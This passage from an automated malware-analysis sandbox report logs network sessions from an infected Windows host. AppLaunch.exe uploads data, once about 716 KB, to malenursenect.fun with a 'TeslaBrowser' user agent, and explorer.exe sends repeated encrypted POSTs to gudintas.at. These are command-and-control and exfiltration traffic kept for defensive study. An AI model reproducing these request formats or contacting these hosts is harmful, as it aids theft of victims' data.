                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:17.913291931 CEST5824INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:17 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=0prnld7ck9n89mhjtjjtdqdc9p; expires=Sat, 27 Jan 2024 09:49:56 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:17 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ajaYbBveHl50%2FtG6m2pzLI4HFo4hbCSGQQ0oCxYIOHaqXe6Zos3M4%2BPh5iagWw6CVoo3oltgq6ajI6llUHINjDPAzmvryIdFdBb4nt%2FZyEeSUiUsQNKoCNafLbDHelvot2MH8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a1319e9206a-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:17.913352966 CEST5824INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        89192.168.2.349911104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:18.126893044 CEST5825OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:18.127362967 CEST5826OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:18.522562981 CEST5827INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:18 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=f7sq25iikm9kovo0t54j8ra8ns; expires=Sat, 27 Jan 2024 09:49:57 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:18 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qvRKa3rF8BAXbdfx4nxI7D2ln9tv8%2BwJX31kEG3wnUhiRbCyu0SY2hXPcwn3IztBYJQXU%2F1mg%2B9rSg8ggsk6k4go31qGI6h02WALPK6lWj2srMX2cvSrAsk0%2BC9367eO5HIeAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a1688502d16-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:18.522629023 CEST5827INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        9192.168.2.349825211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:32.672692060 CEST320OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://mpurr.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 266
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:32.672736883 CEST321OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 34 50 bb fa
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu4PHTZGSpy,J#,h'U:&Vo:A83!/$pKe$omulGuK\%g-j<4[}!^*94
                                                                                                        Oct 3, 2023 18:02:33.767180920 CEST321INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:33 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        90192.168.2.349912104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:18.988774061 CEST5828OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 716161
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:18.989387989 CEST5839OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:19.086343050 CEST5846OUTData Raw: 4f 92 64 4e f2 f7 cc a7 ff 5e 58 6e d3 da 55 ee 9e 7b 3a fc 08 eb 61 86 a9 cb 1d 7b e4 61 3d 7c 47 ca 58 ba 3f 36 66 d3 59 fd 7f d1 df dd 77 df bd 21 7b d3 32 32 4d ff 30 16 a0 d6 a5 9a 3d e1 7b 3f 0a 18 a2 fe 09 a3 94 fd 87 be d7 6f 79 e3 eb c3
                                                                                                        Data Ascii: OdN^XnU{:a{a=|GX?6fYw!{22M0={?oy]>]\F>r_"Njp?]F|gzjaP^<}isw15\|/g,;.hwF.XqydgE9S.:d:
                                                                                                        Oct 3, 2023 18:03:19.086343050 CEST5848OUTData Raw: de b4 6b c2 97 57 f5 88 ec b7 ca 4c 0c a7 33 ff 52 0d 20 fb ea b2 06 30 d6 ec 81 9f 2f ea fd d4 df 97 fd 83 b1 2e 66 87 cb 22 f6 28 1a 3f cc f7 81 bf 95 ff ad f4 30 4e 3c 2e a8 dd 8c 59 30 e4 eb 65 56 8a 75 65 c5 12 e4 bc d0 3e 4d 20 f3 41 2b 76
                                                                                                        Data Ascii: kWL3R 0/.f"(?0N<.Y0eVue>M A+v/'r90Wy,fq;][ 2Cfz9gVvO{O"g'r^Xx@Nj<8:6\6bEq`yY,Wp}oY{L
                                                                                                        Oct 3, 2023 18:03:19.086477995 CEST5851OUTData Raw: 1b a3 72 5f 82 63 6d e1 b8 50 75 1f be 98 50 d6 fa 90 a3 71 3b b0 ef 62 cd c7 32 a8 8f c1 75 e0 74 d4 d8 58 7d 24 d4 d6 28 53 b0 b6 93 fd 00 71 1b 58 db a7 9f 18 fb cf a7 7f 43 9e 86 0c 0e f5 7b 58 6e 9a fc 81 7d 3e c3 cc e8 54 2f c8 31 fc ac fa
                                                                                                        Data Ascii: r_cmPuPq;b2utX}$(SqXC{Xn}>T/1uy,k-m0/|iC!Sxuc1?%kV:y0'WDl&q<O4:M~EuO>Bvk\{m}}W^<?C/
                                                                                                        Oct 3, 2023 18:03:19.086477995 CEST5853OUTData Raw: b2 de 88 79 21 c7 32 f3 95 67 86 88 ba 25 66 20 89 fa a3 4f 66 2f 96 bf ab 15 bf 0d 97 c1 7c ae 96 5e 2e 6d ba c5 a1 62 c6 b6 78 b9 db 79 cd 51 6e f3 9e af 74 fb 1d fa 0f 6e cb b1 3f 74 87 9c 20 dc ef 56 77 e0 51 5f 77 7b 1f f2 37 6e d3 6e 2f 75
                                                                                                        Data Ascii: y!2g%f Of/|^.mbxyQntn?t VwQ_w{7nn/ukV\cMceB!c_dY\gG>DhGNDuZ>~M\^G!'8QnW?,=z|u^'g(op~txy
                                                                                                        Oct 3, 2023 18:03:19.086802959 CEST5856OUTData Raw: 52 2c 53 e6 72 d6 7d 92 ef a5 16 1b c4 ef 56 2e 77 8e 13 ab e5 f4 5e cf ef 9f d0 b7 d8 62 90 dc 4e e5 81 96 c6 4f 9f 89 fc 5c 8d e3 67 44 7e c0 be e7 2f 4e eb 79 fe d3 38 ad e7 f9 4f bc 82 e3 f8 e1 78 8f fb 1a 3c a6 d5 fe 07 ea 06 35 56 14 b2 c2
                                                                                                        Data Ascii: R,Sr}V.w^bNO\gD~/Ny8Ox<5VVNy+'{EXy[JBpnc)bfg1>duwYSN}oiX->hFfc;7xUq"I;?|&x-WO[?];LS^SykA#
                                                                                                        Oct 3, 2023 18:03:19.086803913 CEST5859OUTData Raw: dd 5a fe 37 f8 7d df f2 bf 96 ff d5 c9 ff ac 31 d5 6c e4 7f 3e 06 68 d5 d1 f2 bf 72 5c a6 2e de d7 f2 bf 99 cd ff 8e db 65 b4 f8 df d6 80 f3 59 fc 2f eb 3e 73 48 43 d6 34 ff 4b b3 90 01 96 78 06 96 e5 7f d6 73 30 2f ff c3 69 c3 ca ff 7a d7 5d 0f
                                                                                                        Data Ascii: Z7}1l>hr\.eY/>sHC4Kxs0/iz]Kf:rX*oY>N#\kZ|ms7ud-o_Zcvd-[o7o~3x`x?OX|^]{a1
                                                                                                        Oct 3, 2023 18:03:19.086803913 CEST5861OUTData Raw: fe 5a fe 57 27 ff c3 f7 6e a3 c0 ff fa cd fe 5a fe d7 f2 bf 96 ff f9 b9 17 4e b7 58 df c9 bb 4e 84 d6 f2 bf 72 fc af 2e 06 88 f5 6d db 50 dc 2c fe d7 cb 01 8b dd 67 b2 e2 07 9a fc 2f c7 f3 e3 c8 9d 27 0a dd c3 eb 7e 0e 34 c5 ff 2c be d6 04 ff cb
                                                                                                        Data Ascii: ZW'nZNXNr.mP,g/'~4,_$78\Y/:s/iFhwF?3ef__&?V_Hb6,s[=pX-V<V&sl=E~{XDCO{?{'n
                                                                                                        Oct 3, 2023 18:03:19.086903095 CEST5864OUTData Raw: 6e c3 d4 58 f8 b9 db e2 80 b5 2d 49 df 06 9e 56 75 ff cc 36 fe d7 53 76 08 b5 76 2d ff 9b 39 fc 6f 54 fa 75 45 b6 a1 6c fc df 96 ff b5 fc af e5 7f 0d f1 3f e5 71 c8 fa 90 ff f9 18 18 95 cf 9b 37 24 d6 19 6e 2a ce bf 12 b6 79 6c b0 56 a0 ad b9 99
                                                                                                        Data Ascii: nX-IVu6Svv-9oTuEl?q7$n*ylVfIWHcx~oDE8`^U0`{H`vNdr{<bw4qhw[46MM:ajv]aAjMn^<k[1>_
                                                                                                        Oct 3, 2023 18:03:19.182126999 CEST5882OUTData Raw: f2 bf c8 7c fc af eb 13 3c 6e 5a d3 e7 57 16 ff f3 5d 0f 79 af a7 41 33 b9 aa be fa 65 72 a6 9c 10 70 bf 13 ea e2 7f bb 44 56 d1 4f 78 58 f8 5f 11 f6 37 23 f8 5f 45 1b 34 ff 0b 73 00 a7 d8 41 2b 33 ac 24 bb ab 8b 21 d6 cd ff b2 fc 7d 0b f5 cd 57
                                                                                                        Data Ascii: |<nZW]yA3erpDVOxX_7#_E4sA+3$!}Wm_?|u0Y[~cy27O=}Nbpy'>>^U:{Io:3G:tR^1qNm?s{rtY'5=|)
                                                                                                        Oct 3, 2023 18:03:21.052200079 CEST6706INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:20 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=7u0i3ldkcqjhqhkjheem3k9rck; expires=Sat, 27 Jan 2024 09:49:59 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:20 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZ46ogek%2FDTRJFBVLQtwzCWqGnaS74y99nHQ3c%2Fk98ffsEgUR3eY%2BOk5l%2FAxksVDA%2FXF2aklj%2Buz2XW9sSZXy1i4WqsTqE20nv3pGpewl%2BgM2En6utJG3owmni0It27z%2FGvPXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a1beee38024-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:21.052262068 CEST6706INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        91192.168.2.349914189.232.58.10380C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:58.085043907 CEST6714OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://bdyds.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 291
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:03:58.085088015 CEST6714OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 23 e0 85
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuo#E.`~|\Dyn]$J?&H.FaF.6J%i1,@1#0Mm3cRa$(Gq[E%S +
                                                                                                        Oct 3, 2023 18:03:58.782119989 CEST6714INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:03:58 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        92192.168.2.349916211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:02.252079964 CEST6722OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://vashlnsk.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 358
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:02.252079964 CEST6723OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 4e db e5
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuVNW!bilKBl@^(2n+FP1,D)S<4| E:6<|\3[H*gnY^I&B>lR(*Q'
                                                                                                        Oct 3, 2023 18:04:03.487910032 CEST6723INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:02 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        93192.168.2.349917211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:07.290597916 CEST6724OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://hwqywgiplc.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 232
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:07.291421890 CEST6724OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 0f ef 86
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu{D8jEnNMAnt`V:>jv+/wRC9P}xoxQC\\ <7K,{"s'gWit([|
                                                                                                        Oct 3, 2023 18:04:08.563766956 CEST6725INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:07 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        94192.168.2.349918211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:11.731758118 CEST6726OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://mefip.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 252
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:11.731794119 CEST6726OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 4f c0 9a
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vunOU^tL@$,eQhRyWizI>`A_U)e<W1B@({wNc->SL-qB}2YtR?#A
                                                                                                        Oct 3, 2023 18:04:13.013216972 CEST6726INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:12 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        95192.168.2.349919211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:16.248222113 CEST6727OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://kcdnqqhwdw.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 207
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:16.248256922 CEST6727OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 0e a2 e1
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu:{CCqeD;gJsjG 'F;=ln#W2=?L4UG/?pvKP
                                                                                                        Oct 3, 2023 18:04:17.406137943 CEST6728INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:16 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        96192.168.2.349920211.171.233.12980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:21.175301075 CEST6729OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://vyeap.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 137
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:21.175301075 CEST6729OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 1b bf ea
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vudt5UuYVGs!w0O'c6.)
                                                                                                        Oct 3, 2023 18:04:22.305699110 CEST6729INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:21 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        97192.168.2.349921211.171.233.12980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
